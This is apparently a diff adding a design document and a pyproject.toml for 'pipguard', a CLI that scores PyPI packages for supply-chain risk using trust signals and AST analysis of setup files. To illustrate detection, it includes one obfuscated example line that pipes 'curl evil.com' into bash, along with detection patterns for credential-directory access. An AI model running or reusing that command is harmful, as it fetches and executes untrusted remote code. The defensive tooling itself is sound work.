+ | Known CVEs | OSV.dev API |
27
+ | GitHub README (only when classifiers are ambiguous) | GitHub API |
28
+
29
+ ### Layer 2 — Static Code Analysis (AST-based)
30
+
31
+ Downloads the source tarball and analyzes `setup.py`, `pyproject.toml`, `__init__.py` — without executing anything.
32
+
33
+ Flags: network requests, env var access (`os.environ`), home dir access (`~/.ssh`, `~/.aws`), shell execution (`subprocess`, `eval`, `exec`), base64 obfuscation, DNS lookups.
34
+
35
+ **Why AST over grep:** AST catches obfuscated patterns grep misses:
36
+ ```python
37
+ getattr(os, 'sys'+'tem')('curl evil.com | bash') # grep misses, AST catches
38
+ ```
39
+
40
+ ---
41
+
42
+ ## Scoring
43
+
44
+ ```
45
+ 0–30 → LOW RISK 31–60 → MEDIUM RISK 61+ → HIGH RISK
46
+ ```
47
+
48
+ | Signal | Points |
49
+ |--------|--------|
50
+ | Known CVE | +50 |
51
+ | Shell execution in setup.py | +40 |
52
+ | Base64 obfuscation | +35 |
53
+ | Package < 30 days old | +30 |
54
+ | Home directory access | +30 |
55
+ | Network call in setup.py | +25 |
56
+ | Reads env variables | +20 |
57
+ | Maintainer account < 60 days old | +20 |
58
+ | Download spike (< 50k total only) | +15 |
59
+ | No GitHub repo | +10 |
60
+
61
+ **Context-aware:** same flag scores differently based on trust profile. Network call from a 4-year-old package with 50M downloads weighs less than the same flag from a 2-week-old package. Age and downloads compound.
62
+
63
+ **No static whitelist.** A whitelist creates a blind spot — a compromised boto3 would silently pass. Context-aware scoring + classifier gating handles false positives without a trust bypass.
64
+
65
+ **Configurable weights** via `~/.pipguard/config.toml`. Ships with a `recommended` preset. Warns when user deviates significantly: `"Custom weights active — run pipguard config reset to restore recommended"`.
66
+
67
+ ---
68
+
69
+ ## Classifier-Gated GitHub Calls
70
+
71
+ PyPI classifiers (free — already in the PyPI response) gate whether the GitHub README call is made. GitHub's unauthenticated limit is 60 req/hr — a 20-package scan exhausts it fast without gating.
72
+
73
+ ```
74
+ Pure Python classifiers + network call found → FLAG at full weight, skip GitHub
75
+ Networking / AI / Build Tools classifiers → Fetch GitHub README, discount if intent matches
76
+ No useful classifiers → Fetch GitHub README, default weight if unclear
77
+ ```
78
+
79
+ **Pure Python classifiers:** `Topic :: Utilities`, `Topic :: Text Processing`, `Topic :: Software Development :: Libraries :: Python Modules`
80
+
81
+ **"Network expected" classifiers:** `Topic :: Internet :: WWW/HTTP`, `Topic :: System :: Networking`, `Topic :: Scientific/Engineering :: Artificial Intelligence`, `Topic :: Software Development :: Build Tools`
82
+
83
+ ---
84
+
85
+ ## CLI
86
+
87
+ ```bash
88
+ pipguard install <package> # analyze then install
89
+ pipguard scan # scan requirements.txt
90
+ pipguard scan --ci --fail-on [medium|high] # CI mode, exits 1 on threshold (default: high)
91
+ pipguard info <package> [--no-cache] # report without installing
92
+ pipguard history # past scan results
93
+ pipguard update --force # wipe + refresh CVE cache immediately
94
+ ```
95
+
96
+ **Interception:** the shipped `configure` command installs a shell `pip()` function that routes `pip install` through pipguard and falls back to `command pip` for every other subcommand, so a broken interceptor does not block non-install pip usage. Migrating to a pip-native integration point (to remove the shell-config dependency entirely) is planned.
97
+
98
+ **Example output:**
99
+ ```
100
+ $ pipguard install litellm
101
+
102
+ ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
103
+ TRUST SCORE
104
+ ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
105
+ Package age: 2 months ⚠️
106
+ Maintainer age: 3 weeks 🔴
107
+ Download spike: +380% ⚠️
108
+ Other packages: 0 🔴
109
+ Known vulns: 0 ✅
110
+
111
+ ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
112
+ CODE ANALYSIS (setup.py)
113
+ ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
114
+ Network requests: FOUND 🔴
115
+ Env var access: FOUND 🔴
116
+ Shell execution: NOT FOUND ✅
117
+ Obfuscation: NOT FOUND ✅
118
+
119
+ ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
120
+ VERDICT: 🔴 HIGH RISK (Score: 75)
121
+ ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
122
+ Proceed anyway? [y/N]
123
+ ```
124
+
125
+ ---
126
+
127
+ ## Tech Stack
128
+
129
+ | Component | Choice |
130
+ |-----------|--------|
131
+ | Language | Python (dogfoods itself) |
132
+ | CLI | Typer |
133
+ | HTTP | httpx (API calls + tarball downloads — no requests) |
134
+ | AST | Python `ast` stdlib |
135
+ | Output | Rich |
136
+ | Cache | SQLite stdlib (`~/.pipguard/cache.db`) |
137
+
138
+ **Caching:** trust scores cached 24hr, CVE data 6hr. Shows `(cached)` on hits. `--no-cache` bypasses per-run. `pipguard update --force` wipes CVE cache immediately for zero-day events.
139
+
140
+ **Version pinning:** always checks the exact pinned version from requirements.txt, not latest. Warns on unpinned deps.
141
+
142
+ ---
143
+
144
+ ## Build Order
145
+
146
+ **Week 1 — Core**
147
+ - [ ] CLI skeleton (Typer), PyPI fetch, OSV.dev check, scoring, SQLite cache
148
+
149
+ **Week 2 — Code Analysis**
150
+ - [ ] Tarball download (httpx, version-specific), AST parser, red flag detection, classifier-gated scoring, GitHub README for ambiguous cases
151
+
152
+ **Week 3 — Polish**
153
+ - [ ] Rich output, requirements.txt scan, pip plugin integration, `--ci`/`--fail-on`/`--no-cache`/`--force`, configurable weights + preset warning, README + demo GIF
154
+
155
+ ---
156
+
157
+ ## vs. Existing Tools
158
+
159
+ | Tool | Gap |
160
+ |------|-----|
161
+ | `pip audit` | Only known CVEs — misses new malicious packages |
162
+ | socket.dev | Not a CLI intercept, separate workflow |
163
+ | OSV.dev | Database only, no workflow integration |
164
+ | Dependabot | Reacts after install, not before |
165
+ | **pipguard** | Intercepts at install, combines trust signals + AST analysis |
@@ -0,0 +1,20 @@
1
+ [build-system]
2
+ requires = ["hatchling"]
3
+ build-backend = "hatchling.build"
4
+
5
+ [project]
6
+ name = "pipguard-cli"
7
+ version = "0.1.0"
8
+ description = "Supply chain attack prevention for pip installs"
9
+ requires-python = ">=3.10"
10
+ dependencies = [
11
+ "typer>=0.9.0",
12
+ "httpx>=0.27.0",
13
+ "rich>=13.0.0",
14
+ ]
15
+
16
+ [project.scripts]
17
+ pipguard = "pipguard.main:app"
18
+
19
+ [tool.hatch.build.targets.wheel]
20
+ packages = ["pipguard"]